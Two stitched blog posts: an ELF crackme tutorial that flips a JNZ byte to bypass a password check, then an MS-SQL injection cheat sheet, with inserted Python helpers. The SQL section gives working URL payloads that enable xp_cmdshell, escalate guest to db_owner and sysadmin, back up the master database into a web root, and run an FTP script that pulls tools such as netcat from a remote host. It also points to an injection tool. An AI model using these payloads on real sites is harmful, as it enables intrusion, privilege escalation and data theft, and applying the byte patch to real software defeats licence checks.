ELF Reversing, Beginner

Hey

It's me again, MrXX.
As I said I would, in this post I am going to talk about simple ELF reversing.

I don't know how many people will talk about this later, but this tutorial is something a bit strange and maybe new to learn (I have seen many cracking teams working only on Windows, because Linux is free, but every OS needs some cracking sometimes).

All the words you will read come from the author: MrXX (like the previous post).
OK, let's get started.

First, we need some tools.
We use these tools to make our way easier:
1- Some program to crack
2- A GUI debugger
3- A hex editor
4- Some knowledge of ASM and cracking

OK, the first thing: some project to crack

Source Code

Compiled Project

Cracked Project

I wrote a simple crackme for this part.
The crackme is open source: he he

#include <stdio.h>

int main(void)
{
    int password = 123456;   /* hard-coded value the input is compared against */
    int inputpass;

    printf("Please Enter a Password to continue > ");
    scanf(" %d", &inputpass);

    /* this comparison is the CMP / JNZ pair seen later in the debugger */
    if (inputpass == password) {
        printf("\nWelcome u will able to access the Tool\n");
        printf("\n======================================\n");
        printf("\nU able Reverse the linux elf file \n");
        printf("\nKeep Good job    \n");
        printf("\n======================================\n");
    } else {
        printf("\nBAD Password\n");
    }

    return 0;
}

As you can see in the code, there is an IF statement that checks the value.
First, the password is 123456.
If the password equals the user input, it shows the good message; if not, it shows the bad message.
I compiled it beforehand, executed it and saw the prompt:
Please Enter a Password to continue > 123
I entered a wrong code and saw the bad message.

Bad Message


Now, how can I get to see the good message?
Let's start some reversing.
2- I need a GUI debugger (why? because I have often used Windows debuggers like Olly or IDA, and now I am addicted to using a GUI).
OK, that isn't a problem (but don't be lazy like me, you should use a command-line debugger like: many ….).
I went and got the Zero Debugger from this address:
http://www.zero-bugs.com
(this is one of the Linux apps that needs to be cracked, and I will release the patch for it later)
I started up my Ubuntu Linux (because I use the Ubuntu version of Zero Debugger).
Then I installed Zero Debugger (some packages need to be installed first) and ran the debugger.
In Zero Debugger I went to the File > Execute menu, opened my ELF file and saw the disassembly of the ELF.

ZeroDebugger


I scrolled down some lines and saw the CMP (compare), and on the line under it I saw the JNZ statement; yeah, looks good (4- this is where you need some knowledge of ASM and cracking).
I wrote down the line: 08048406 75 52   jnz 0x804845a
This is cool for a first crackme; we don't need to step into the line and see what's inside, because the crackme is simple.

3- Now I need to edit the line and change the hex 75 52 to 74 52.
OK, I started the hexedit program.

HexEditing


I went to the 00000400 line, found the byte at hex offset 406 (remember the 08048406) and changed the 75 to 74.
I saved the file as the cracked crackme and executed it again.
I entered a wrong code again and saw, yeah, the good message.

Good Message


We were able to reverse the ELF file.
That's it; the whole routine was simple.
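
Why address 08048406 sits at file offset 406, and how to tell whether a copy of the binary carries the original 75 (jnz) or the flipped 74 (jz): the following is an added example, not part of the original post. It assumes a little-endian ELF32 file whose loadable segment maps file offset 0 at 0x08048000 (the usual i386 layout, which the address in the post suggests); the function names and the in-memory test image are constructed for illustration.

```python
import struct

PT_LOAD = 1
SHORT_JCC = {0x74: "jz", 0x75: "jnz"}   # one-byte opcodes, each followed by rel8

def vaddr_to_offset(elf, vaddr):
    """Translate a virtual address to a file offset via the ELF32 PT_LOAD headers."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF32 image")
    (e_phoff,) = struct.unpack_from("<I", elf, 0x1C)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x2A)
    for index in range(e_phnum):
        p_type, p_offset, p_vaddr, _p_paddr, p_filesz = struct.unpack_from(
            "<5I", elf, e_phoff + index * e_phentsize)
        if p_type == PT_LOAD and p_vaddr <= vaddr < p_vaddr + p_filesz:
            return vaddr - p_vaddr + p_offset
    raise ValueError("address is not backed by bytes in the file")

def branch_at(elf, vaddr):
    """Return (file offset, mnemonic, jump target) for a short Jcc at vaddr."""
    offset = vaddr_to_offset(elf, vaddr)
    opcode = elf[offset]
    (rel8,) = struct.unpack_from("<b", elf, offset + 1)
    return offset, SHORT_JCC.get(opcode, "other"), vaddr + 2 + rel8

def build_sample(opcode):
    """Constructed image (not the post's binary): file offset 0 mapped at 0x08048000."""
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", b"\x7fELF\x01\x01\x01" + bytes(9),
                       2, 3, 1, 0x08048400, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_LOAD, 0, 0x08048000, 0x08048000,
                       0x500, 0x500, 5, 0x1000)
    image = bytearray(ehdr + phdr).ljust(0x500, b"\x90")
    image[0x406:0x408] = bytes([opcode, 0x52])
    return bytes(image)

if __name__ == "__main__":
    for opcode in (0x75, 0x74):
        offset, mnemonic, target = branch_at(build_sample(opcode), 0x08048406)
        print(f"offset {offset:#x}: {mnemonic} {target:#x}")
```

The jump target is computed as address + 2 + rel8, which for 75 52 at 08048406 gives the 0x804845a shown by the debugger.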
But don't get too happy, because when the code gets bigger you will run into bad problems (why? because there is no Olly or IDA or simple code to reverse),
and you must work with the command line and many lines of code.

In the next step we are going to crack a bigger crackme, called CrackMe2, which uses a function.
Good luck

MS-SQL Injection Privilege Escalation!

Hi God.

Hi again, my readers!
[Attention]: I break long commands across lines.
1- In MSSQL, when your privilege is USER or db_owner, you can enable xp_dirtree and list (dir) the drive you want.

viewdetail.aspx?test=22′;exec+master.dbo.sp_addextendedproc+
+0x780070005f006400690072007400720065006500,0x7800700073007400610072002e0064006c006c00–

After enabling it, you can execute xp_dirtree, save the result in the database and view it.

2- Enable execution with administrator privilege without execute permission:

Enable XP_EXC:

viewdetail.aspx?test=22′;EXEC+sp_configure+
+’show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

Enable OS_EX

viewdetail.aspx?test=22′;exec sp_configure ‘show advanced options’,1;RECONFIGURE;
exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;

After Execute :

viewdetail.aspx?test=22′;EXEC xp_cmdshell ‘ping 127.0.0.1′ ;

3- Back up the database:

viewdetail.aspx?test=22”+BACKUP database master to disk=’d:\Inetpub\wwwroot\1.zip’;–

4- GUEST = DB_OWNER :

/FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysusers’
exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set sid=0×01,roles=0×01 where name=”guest”’,'xx’ exec sp_executesql N’drop view dbo.test’–

5- ADDING TO “BUILTIN\ADMINISTRATORS”

FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysxlogins’ exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set xstatus=18 where name=”BUILTIN\ADMINISTRATORS”’,'xx’ exec sp_executesql N’drop view dbo.test’–

and then :

FullStory.asp?id=1;exec master..sp_addsrvrolemember ‘nhaxinh’,sysadmin –

ENABLE OPENROWSET/OLEDB :

FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

6- Open Remote Link :

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

7 – UPLOAD NETCAT or …

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’, ‘server=UNESCO;uid=BUILTIN\Administrators;pwd=’,'set fmtonly off select 1 exec master..xp_cmdshell “echo open a.b.c.d >f & echo user a a >>f & echo bin >>f & echo cd a >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f” & del f’)– (> == “>”)

Code:

echo open a.b.c.d >f

echo user a a >>f

echo bin >> f

echo cd a >>f

echo mget * >>f

echo quit >>f

ftp -v -i -n -s:f

del f
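
Seen from the logging side, the requests in this post share a small set of procedure names, some of them hidden in 0x… hex literals. The following is an added example, not part of the original post: it URL-decodes a logged request, expands hex literals that hold UTF-16LE text, and reports which of the names used above appear. The log lines are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Procedure/statement names that appear in the requests in this post.
WATCHLIST = ("sp_addextendedproc", "xp_dirtree", "sp_configure", "xp_cmdshell",
             "ole automation procedures", "backup database", "sp_msdropretry",
             "sp_addsrvrolemember", "openrowset", "sp_executesql")
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2})+)", re.IGNORECASE)

def decode_hex_literals(text):
    """Expand T-SQL 0x... literals that hold printable UTF-16LE text."""
    def expand(match):
        try:
            decoded = bytes.fromhex(match.group(1)).decode("utf-16-le")
        except UnicodeDecodeError:
            return match.group(0)          # e.g. 0x01: not text, keep as-is
        ok = decoded.isascii() and decoded.isprintable()
        return decoded if ok else match.group(0)
    return HEX_LITERAL.sub(expand, text)

def suspicious_terms(logged_request):
    """Return the watch-list terms present once the encodings are undone."""
    text = decode_hex_literals(unquote_plus(logged_request))
    text = re.sub(r"\s+", " ", text).lower()
    return [term for term in WATCHLIST if term in text]

# Constructed log lines (hypothetical, modelled on the requests above).
SAMPLE_LOG = [
    "GET /viewdetail.aspx?test=22",
    "GET /viewdetail.aspx?test=22';exec+master.dbo.sp_addextendedproc+"
    "0x780070005f006400690072007400720065006500,"
    "0x7800700073007400610072002e0064006c006c00--",
    "GET /viewdetail.aspx?test=22';EXEC+sp_configure+'show+advanced+options',1;"
    "RECONFIGURE;EXEC%20sp_configure%20'xp_cmdshell',1;RECONFIGURE;",
]

def scan(lines):
    """Map 1-based line number -> matched terms, for lines with any match."""
    report = {}
    for number, line in enumerate(lines, 1):
        hits = suspicious_terms(line)
        if hits:
            report[number] = hits
    return report

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(number, hits)
```

The two hex literals in step 1 decode to xp_dirtree and xpstar.dll, which is why a plain keyword match on the raw URL misses that request.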

Another way?!

You can use PANGOLIN; it is a good SQL injector that bypasses some protections:

Download:

http://www.nosec.org/

Enjoy .

Daphne .
